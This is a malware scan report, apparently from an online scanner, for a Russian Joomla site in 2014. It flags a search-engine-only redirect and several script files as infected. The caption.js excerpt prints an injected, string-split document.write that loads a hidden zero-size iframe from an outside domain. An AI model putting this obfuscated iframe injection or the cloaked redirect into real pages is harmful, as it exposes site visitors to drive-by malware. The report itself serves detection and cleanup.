Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.ling-kniga.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.ling-kniga.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 20 Sep 2014 00:59:34 GMT Location: http://tinyurl.com/c2td3xs Server: Jino.ru/mod_pizza Content-Length: 89 Content-Type: text/html Set-Cookie: _cutt_caches_images=1411174774; expires=Sun, 21-Sep-2014 00:59:34 GMT; path=/ | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.ling-kniga.ru/ | 200 OK Content-Length: 24020 Content-Type: text/html | clean |
http://www.ling-kniga.ru/media/system/js/caption.js | 200 OK Content-Length: 12142 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = document.write('<iframe src="'+'ht'+'tp://ibs'+'encoa'+'c'+'h'+'ing.dk/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>'); Antivirus reports:
| ||
http://www.ling-kniga.ru/modules/mod_jaslideshow2/assets/script.js | 200 OK Content-Length: 29355 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Element.Events.extend({ 'wheelup': { type: Element.Events.mousewheel.type, map: function(event){ event = new Event(event); if (event.wheel >= 0) this.fireEvent('wheelup', event) } }, 'wheeldown': { type: Element.Events.mousewheel.type, map: function(event){ event = new Event(event); if (event.wheel <= 0) this.fireEvent('wheeldown', event) } } }); var JASlideshowThre Antivirus reports:
| ||
http://www.ling-kniga.ru/plugins/content/ja_tabs/ja_tabs.js | 200 OK Content-Length: 24128 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var wrap_W = 0; var JATabs = new Class({ initialize: function(element, options) { this.options = Object.extend({ position: 'top', width: '100%', height: 'auto', skipAnim: false, animType: 'animMoveHor', mouseType: 'mouseover', changeTransition: Fx.Transitions.Pow.easeIn, duration: 1000, mouseOverClass: 'hover', activateOnLoad: 'first', useAjax: false, ajax Antivirus reports:
| ||
http://www.ling-kniga.ru/templates/ja_nickel/js/ja.script.js | 200 OK Content-Length: 22693 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function switchFontSize (ckname,val){ var bd = $E('body'); switch (val) { case 'inc': if (CurrentFontSize+1 < 7) { bd.removeClass('fs'+CurrentFontSize); CurrentFontSize++; bd.addClass('fs'+CurrentFontSize); } break; case 'dec': if (CurrentFontSize-1 > 0) { bd.removeClass('fs'+CurrentFontSize); CurrentFontSize--; bd.addClass('fs'+CurrentFontSize); } break; default Antivirus reports:
| ||
http://www.ling-kniga.ru/templates/ja_nickel/ja_menus/ja_cssmenu/ja.cssmenu.js | 200 OK Content-Length: 11160 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) sfHover = function() { var sfEls = document.getElementById("ja-cssmenu").getElementsByTagName("li"); for (var i=0; i<sfEls.length; ++i) { sfEls[i].onmouseover=function() { clearTimeout(this.timer); if(this.className.indexOf("sfhover") == -1) this.className+="sfhover"; } sfEls[i].onmouseout=function() { this.timer = setTimeout(sfHoverOut.bind(this), 20); } } } function sfHoverOut() { Antivirus reports:
| ||
http://www.ling-kniga.ru/index.php | 200 OK Content-Length: 24038 Content-Type: text/html | clean |
http://www.ling-kniga.ru/index.php/o-kompanii.html | 200 OK Content-Length: 13611 Content-Type: text/html | clean |
http://www.ling-kniga.ru/index.php/o-kompanii.html/o-kompanii.html | 404 Not Found Content-Length: 1850 Content-Type: text/html | clean |
http://www.ling-kniga.ru/test404page.js | 404 Not Found Content-Length: 1734 Content-Type: text/html | clean |
http://www.ling-kniga.ru/index.php/news.html | 200 OK Content-Length: 17213 Content-Type: text/html | clean |
http://www.ling-kniga.ru/plugins/content/mavikthumbnails/slimbox-mt1.1/js/slimbox.js | 200 OK Content-Length: 14480 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Slimbox=(function(){var G=window,v,h,H=-1,q,x,F,w,z,N,t,l=r.bindWithEvent(),f=window.opera&&(navigator.appVersion>="9.3"),p=document.documentElement,o={},u=new Image(),L=new Image(),J,b,i,K,e,I,c,B,M,y,j,d,D;G.addEvent("domready",function(){$(document.body).adopt($$(J=new Element("div",{id:"lbOverlay"}),b=new Element("div",{id:"lbCenter"}),I=new Element("div",{id:"lbBottomContainer"})).setStyle("display","none"));i=new Element("div",{id:"lbImage"}).injectInside(b).adopt(K=new Elem Antivirus reports:
| ||
http://www.ling-kniga.ru/index.php/news.html/news.html | 404 Not Found Content-Length: 1850 Content-Type: text/html | clean |
http://www.ling-kniga.ru/index.php/ | 200 OK Content-Length: 24040 Content-Type: text/html | clean |
http://www.ling-kniga.ru/index.php/sotrudnihestvo/avtory.html | 200 OK Content-Length: 14457 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ling-kniga.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ling-kniga.ru/
Result: ling-kniga.ru is not infected or malware details are not published yet.
Result: ling-kniga.ru is not infected or malware details are not published yet.